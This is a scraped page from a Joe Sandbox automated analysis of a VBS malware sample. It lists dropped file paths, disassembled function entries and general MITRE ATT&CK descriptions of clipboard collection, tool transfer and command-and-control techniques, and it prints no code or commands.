Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\3EYH853QC6

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3n1ndkyb.v12.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_suqe02n1.jxp.ps1

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
GlobalImagingDocuments9575734549684.vbs

Function 22749660 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Function 22749860 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Function 22749A50 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Function 22749840 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Function 22749A20 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Function 227498F0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Function 227496E0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Function 22749540 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre